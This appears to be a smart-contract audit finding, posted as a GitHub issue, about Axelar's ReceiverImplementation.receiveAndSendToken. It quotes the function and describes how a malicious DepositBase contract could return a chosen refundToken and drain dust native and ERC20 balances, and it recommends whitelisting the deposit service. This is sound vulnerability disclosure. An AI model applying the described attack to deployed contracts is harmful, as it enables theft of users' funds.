Malicious DepositBase may stole dust fund from ReceiverImplementation
// @dev This function is used for delegate by DepositReceiver deployed above
// Context: msg.sender == AxelarDepositService, this == DepositReceiver
function receiveAndSendToken(
address payable refundAddress,
string calldata destinationChain,
string calldata destinationAddress,
string calldata symbol
) external {
// Always refunding native otherwise it's sent on DepositReceiver self destruction
if (address(this).balance > 0) refundAddress.transfer(address(this).balance);
address tokenAddress = IAxelarGateway(gateway).tokenAddresses(symbol);
// Checking with AxelarDepositService if need to refund a token
address refund = DepositBase(msg.sender).refundToken();
if (refund != address(0)) {
_safeTransfer(refund, refundAddress, IERC20(refund).balanceOf(address(this)));
return;
}
uint256 amount = IERC20(tokenAddress).balanceOf(address(this));
if (amount == 0) revert NothingDeposited();
// Sending the token trough the gateway
IERC20(tokenAddress).approve(gateway, amount);
IAxelarGateway(gateway).sendToken(destinationChain, destinationAddress, symbol, amount);
}
Attacker just craft a malicious DepositBase with refundToken has a value of token address that he want to steal. And call ReceiverImplementation.receiveAndSendToken from that contract to get both dust native token from if (address(this).balance > 0) refundAddress.transfer(address(this).balance); and ERC20 token from _safeTransfer(refund, refundAddress, IERC20(refund).balanceOf(address(this)));
Manual review
Whitelist the valid AxelarDepositService
The text was updated successfully, but these errors were encountered:
All reactions